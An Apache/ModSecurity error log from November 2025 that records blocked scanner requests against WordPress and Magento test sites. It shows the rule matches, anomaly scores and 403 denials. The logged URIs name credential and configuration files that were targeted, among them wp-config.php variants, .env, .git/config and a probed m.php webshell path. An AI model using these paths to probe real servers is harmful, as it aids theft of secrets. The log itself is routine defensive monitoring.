[Sun Nov 23 00:36:48.496980 2025] [:error] [pid 264142] [client 217.170.194.172:57757] [client 217.170.194.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEDACHkR_YOZwyOjAWgAAAAQ"]
[Sun Nov 23 00:36:48.497190 2025] [:error] [pid 264142] [client 217.170.194.172:57757] [client 217.170.194.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEDACHkR_YOZwyOjAWgAAAAQ"]
[Sun Nov 23 00:36:49.102224 2025] [:error] [pid 264216] [client 93.71.103.137:35399] [client 93.71.103.137] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJEUuy3Z5uOc28nrq_PgAAAAY"]
[Sun Nov 23 00:36:49.102512 2025] [:error] [pid 264216] [client 93.71.103.137:35399] [client 93.71.103.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJEUuy3Z5uOc28nrq_PgAAAAY"]
[Sun Nov 23 00:36:49.102717 2025] [:error] [pid 264216] [client 93.71.103.137:35399] [client 93.71.103.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJEUuy3Z5uOc28nrq_PgAAAAY"]
[Sun Nov 23 00:36:50.994904 2025] [:error] [pid 263846] [client 156.146.41.199:43067] [client 156.146.41.199] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.suspected"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEp1oC-JOo5N4AW6aMwAAAAU"]
[Sun Nov 23 00:36:50.995241 2025] [:error] [pid 263846] [client 156.146.41.199:43067] [client 156.146.41.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEp1oC-JOo5N4AW6aMwAAAAU"]
[Sun Nov 23 00:36:50.995437 2025] [:error] [pid 263846] [client 156.146.41.199:43067] [client 156.146.41.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEp1oC-JOo5N4AW6aMwAAAAU"]
[Sun Nov 23 00:36:51.858625 2025] [:error] [pid 264184] [client 185.40.4.132:38182] [client 185.40.4.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.malware"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJE3HQwttq68ko8qFbxAAAAAA"]
[Sun Nov 23 00:36:51.858917 2025] [:error] [pid 264184] [client 185.40.4.132:38182] [client 185.40.4.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJE3HQwttq68ko8qFbxAAAAAA"]
[Sun Nov 23 00:36:51.859111 2025] [:error] [pid 264184] [client 185.40.4.132:38182] [client 185.40.4.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJE3HQwttq68ko8qFbxAAAAAA"]
[Sun Nov 23 00:37:52.500613 2025] [:error] [pid 264184] [client 217.170.194.172:42547] [client 217.170.194.172] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.suspected"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJUHHQwttq68ko8qFbxQAAAAA"]
[Sun Nov 23 00:37:52.501008 2025] [:error] [pid 264184] [client 217.170.194.172:42547] [client 217.170.194.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJUHHQwttq68ko8qFbxQAAAAA"]
[Sun Nov 23 00:37:52.501207 2025] [:error] [pid 264184] [client 217.170.194.172:42547] [client 217.170.194.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJUHHQwttq68ko8qFbxQAAAAA"]
[Sun Nov 23 00:37:53.908796 2025] [:error] [pid 263848] [client 209.50.228.91:34019] [client 209.50.228.91] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.malware"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJUd1BKOLABWPPh6ldzwAAAAI"]
[Sun Nov 23 00:37:53.909070 2025] [:error] [pid 263848] [client 209.50.228.91:34019] [client 209.50.228.91] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJUd1BKOLABWPPh6ldzwAAAAI"]
[Sun Nov 23 00:37:53.909262 2025] [:error] [pid 263848] [client 209.50.228.91:34019] [client 209.50.228.91] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJUd1BKOLABWPPh6ldzwAAAAI"]
[Sun Nov 23 00:39:34.120410 2025] [authz_core:error] [pid 264184] [client 46.246.122.37:1287] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 00:39:34.929126 2025] [authz_core:error] [pid 263848] [client 46.246.122.37:1282] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 11:03:49.829622 2025] [:error] [pid 266321] [client 162.158.238.115:12873] [client 162.158.238.115] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSLcBfBIWxzSgQJzzRhRmAAAAAQ"]
[Sun Nov 23 11:03:49.829938 2025] [:error] [pid 266321] [client 162.158.238.115:12873] [client 162.158.238.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSLcBfBIWxzSgQJzzRhRmAAAAAQ"]
[Sun Nov 23 11:03:49.830105 2025] [:error] [pid 266321] [client 162.158.238.115:12873] [client 162.158.238.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSLcBfBIWxzSgQJzzRhRmAAAAAQ"]
[Mon Nov 24 05:15:14.717360 2025] [authz_core:error] [pid 290074] [client 206.189.19.19:36870] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 24 05:15:15.017385 2025] [:error] [pid 289422] [client 206.189.19.19:36896] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSPb06uPUsqg8dzYKhNYTwAAAAM"]
[Mon Nov 24 05:15:15.017633 2025] [:error] [pid 289422] [client 206.189.19.19:36896] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSPb06uPUsqg8dzYKhNYTwAAAAM"]
[Mon Nov 24 05:15:15.017803 2025] [:error] [pid 289422] [client 206.189.19.19:36896] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSPb06uPUsqg8dzYKhNYTwAAAAM"]
[Mon Nov 24 05:15:15.112554 2025] [:error] [pid 289423] [client 206.189.19.19:36904] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSPb02QD9_sbehPhIhHhBQAAAAQ"]
[Mon Nov 24 05:15:15.112789 2025] [:error] [pid 289423] [client 206.189.19.19:36904] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSPb02QD9_sbehPhIhHhBQAAAAQ"]
[Mon Nov 24 05:15:15.112946 2025] [:error] [pid 289423] [client 206.189.19.19:36904] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSPb02QD9_sbehPhIhHhBQAAAAQ"]
[Mon Nov 24 05:15:15.210361 2025] [:error] [pid 289421] [client 206.189.19.19:36912] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSPb08L1iBXL_RQpp4IFqQAAAAI"]
[Mon Nov 24 05:15:15.210602 2025] [:error] [pid 289421] [client 206.189.19.19:36912] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSPb08L1iBXL_RQpp4IFqQAAAAI"]
[Mon Nov 24 05:15:15.210796 2025] [:error] [pid 289421] [client 206.189.19.19:36912] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSPb08L1iBXL_RQpp4IFqQAAAAI"]
[Mon Nov 24 05:41:27.503283 2025] [php:error] [pid 290812] [client 4.211.111.86:45971] script '/var/www/magento.test.indacotrentino.com/www/pub/images/m.php' not found or unable to stat
[Mon Nov 24 09:48:40.053972 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY4QAAAAM"]
[Mon Nov 24 09:48:40.054214 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY4QAAAAM"]
[Mon Nov 24 09:48:40.054424 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY4QAAAAM"]
[Mon Nov 24 09:48:40.138164 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5AAAAAM"]
[Mon Nov 24 09:48:40.138423 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5AAAAAM"]
[Mon Nov 24 09:48:40.138615 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5AAAAAM"]
[Mon Nov 24 09:48:40.163949 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5QAAAAM"]
[Mon Nov 24 09:48:40.164181 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5QAAAAM"]
[Mon Nov 24 09:48:40.164376 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5QAAAAM"]
[Mon Nov 24 09:48:40.192911 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5gAAAAM"]
